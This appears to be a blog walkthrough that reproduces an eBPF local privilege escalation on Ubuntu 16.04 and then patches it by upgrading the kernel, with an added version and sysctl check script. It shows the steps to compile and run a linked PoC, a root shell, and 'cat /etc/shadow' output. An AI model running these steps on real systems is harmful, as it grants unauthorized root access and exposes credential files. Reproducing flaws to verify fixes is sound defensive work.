Reproducing the Ubuntu 16.04 local privilege escalation vulnerability

1. Vulnerability description
The flaw lives in the eBPF bpf(2) system call that ships with the Linux kernel. A user-supplied malicious BPF program makes the eBPF verifier miscompute, which leads to arbitrary kernel memory read/write. An unprivileged user can use this flaw to escalate privileges.
2. Affected scope
Mainly Debian and Ubuntu are affected; Red Hat and CentOS are not affected.
Linux kernel: Linux Kernel Version 4.14 ~ 4.4
Ubuntu versions: 16.04.01 ~ 16.04.04
root@ubuntu:~# cat /etc/issue
Ubuntu 16.04.3 LTS \n \l

root@ubuntu:~# uname -r
4.4.0-87-generic
root@ubuntu:~#
3. Test environment
VM: VMware Workstation 12
Operating system: ubuntu-16.04.3-server-amd64.iso
POC: link: https://pan.baidu.com/s/1Xwg2AF5TCASvETdrW-Vg-A password: b7c2
4. Reproduction steps
step1: check the current local user with id

step2: download the POC into the local home directory
It can be uploaded straight to the server with xftp under Xshell; that part is not covered in detail here.
step3: install the gcc build environment
sudo apt-get install gcc

step4: compile the file upstream44.c with gcc
gcc -o sec upstream44.c
step5: give the sec file execute permission
chmod +x sec


step6: run the sec file to escalate privileges locally
ttgo2@ubuntu:~$ ./sec 
task_struct = ffff88003278aa00
uidptr = ffff8800327d3e04
spawning root shell
root@ubuntu:~#

step7: escalation succeeded; run id and cat /etc/shadow
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare),1000(ttgo2)
root@ubuntu:~# cat /etc/shadow
root:!:17771:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
sys:*:17379:0:99999:7:::
sync:*:17379:0:99999:7:::

5. Fixing the vulnerability
Upgrading the kernel is enough; the procedure is as follows:
step1: find a suitable version; the newest is not necessarily the best
Ubuntu kernel build address: http://kernel.ubuntu.com/~kernel-ppa/mainline/


step2: go into v4.8 and select the following:
linux-headers-4.8.0-040800_4.8.0-040800.201610022031_all.deb 
linux-headers-4.8.0-040800-generic_4.8.0-040800.201610022031_amd64.deb
linux-image-4.8.0-040800-generic_4.8.0-040800.201610022031_amd64.deb

step3: download to a local directory
wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.8/linux-headers-4.8.0-040800-generic_4.8.0-040800.201610022031_amd64.deb
step4: install; the process is as follows:
ttgo2@ubuntu:~$ sudo dpkg -i *.deb
[sudo] password for ttgo2:
Selecting previously unselected package linux-headers-4.8.0-040800.
(Reading database ... 90554 files and directories currently installed.)
Preparing to unpack linux-headers-4.8.0-040800_4.8.0-040800.201610022031_all.deb ...
Unpacking linux-headers-4.8.0-040800 (4.8.0-040800.201610022031) ...
Selecting previously unselected package linux-headers-4.8.0-040800-generic.
Preparing to unpack linux-headers-4.8.0-040800-generic_4.8.0-040800.201610022031_amd64.deb ...
Unpacking linux-headers-4.8.0-040800-generic (4.8.0-040800.201610022031) ...
Selecting previously unselected package linux-image-4.8.0-040800-generic.
Preparing to unpack linux-image-4.8.0-040800-generic_4.8.0-040800.201610022031_amd64.deb ...
Done.
Unpacking linux-image-4.8.0-040800-generic (4.8.0-040800.201610022031) ...
Setting up linux-headers-4.8.0-040800 (4.8.0-040800.201610022031) ...
Setting up linux-headers-4.8.0-040800-generic (4.8.0-040800.201610022031) ...
Setting up linux-image-4.8.0-040800-generic (4.8.0-040800.201610022031) ...
Running depmod.
update-initramfs: deferring update (hook will be called later)
Examining /etc/kernel/postinst.d.
run-parts: executing /etc/kernel/postinst.d/apt-auto-removal 4.8.0-040800-generic /boot/vmlinuz-4.8.0-040800-generic
run-parts: executing /etc/kernel/postinst.d/initramfs-tools 4.8.0-040800-generic /boot/vmlinuz-4.8.0-040800-generic
update-initramfs: Generating /boot/initrd.img-4.8.0-040800-generic
run-parts: executing /etc/kernel/postinst.d/zz-update-grub 4.8.0-040800-generic /boot/vmlinuz-4.8.0-040800-generic
Generating grub configuration file ...
Warning: Setting GRUB_TIMEOUT to a non-zero value when GRUB_HIDDEN_TIMEOUT is set is no longer supported.
Found linux image: /boot/vmlinuz-4.8.0-040800-generic
Found initrd image: /boot/initrd.img-4.8.0-040800-generic
Found linux image: /boot/vmlinuz-4.4.0-87-generic
Found initrd image: /boot/initrd.img-4.4.0-87-generic
done

step5: then reboot the system and check whether the version has been updated to 4.8
ttgo2@ubuntu:~$ uname -sr
Linux 4.8.0-040800-generic
step6: retest whether the vulnerability is fixed
ttgo2@ubuntu:~$ ./sec
task_struct = ffff9923741d5900
error: bogus uid ptr
ttgo2@ubuntu:~$
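A small check script, added here as an example and not part of the original post: it decides whether a host's `uname -r` still predates the 4.8.0 mainline build installed above (the cut-off is an assumption taken from the version the post upgraded to), and also reads the kernel.unprivileged_bpf_disabled sysctl, a hardening knob the post does not mention, which when set to 1 makes the kernel refuse bpf(2) from unprivileged users, the entry point described in section 1.

```shell
# Added example, not part of the original post: check whether a host still runs
# a kernel older than the 4.8.0 mainline build installed above, and whether the
# kernel.unprivileged_bpf_disabled sysctl (a knob the post does not mention)
# already refuses bpf(2) from unprivileged users, the entry point from section 1.

# Assumption: anything below the version the post upgraded to is treated as unpatched.
FIXED_KERNEL="4.8.0"

# version_lt A B: exit 0 when dotted version A is numerically lower than B.
# Build suffixes such as "-87-generic" are stripped first, and fields compare
# as numbers so that 4.14 sorts above 4.8.
version_lt() {
  awk -v a="$1" -v b="$2" 'BEGIN {
    sub(/[^0-9.].*/, "", a); sub(/[^0-9.].*/, "", b)
    na = split(a, A, "."); nb = split(b, B, ".")
    n = (na > nb) ? na : nb
    for (i = 1; i <= n; i++) {
      x = (i <= na) ? A[i] + 0 : 0
      y = (i <= nb) ? B[i] + 0 : 0
      if (x < y) exit 0
      if (x > y) exit 1
    }
    exit 1
  }'
}

# kernel_below_fix RELEASE: exit 0 when a `uname -r` string predates FIXED_KERNEL.
kernel_below_fix() { version_lt "$1" "$FIXED_KERNEL"; }

# unprivileged_bpf_blocked: exit 0 when the running kernel rejects bpf(2) from
# non-root callers (sysctl value 1); any other value or a missing key counts as open.
unprivileged_bpf_blocked() {
  [ "$(sysctl -n kernel.unprivileged_bpf_disabled 2>/dev/null)" = "1" ]
}
# check_host: report both facts for the machine this script runs on.
check_host() {
  running=$(uname -r)
  if kernel_below_fix "$running"; then
    printf 'kernel %s predates %s: apply the upgrade from section 5\n' "$running" "$FIXED_KERNEL"
  else
    printf 'kernel %s is at or above %s\n' "$running" "$FIXED_KERNEL"
  fi
  if unprivileged_bpf_blocked; then
    echo 'unprivileged bpf(2) is disabled by sysctl'
  else
    echo 'unprivileged bpf(2) is allowed (kernel.unprivileged_bpf_disabled != 1)'
  fi
}
if [ "${1:-}" = "--check" ]; then check_host; fi
```

Run it as `sh check.sh --check` on the host; the two version strings shown in this post (4.4.0-87-generic before, 4.8.0-040800-generic after) fall on opposite sides of the cut-off.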

That completes the whole job. Upgrading the kernel during this process carries some risk, so I would suggest reinstalling a fresh system if you can. During my experiment I hit one failed upgrade that left the system unable to boot; luckily I had a VM image. My skill is limited, so experts please advise. Thanks.
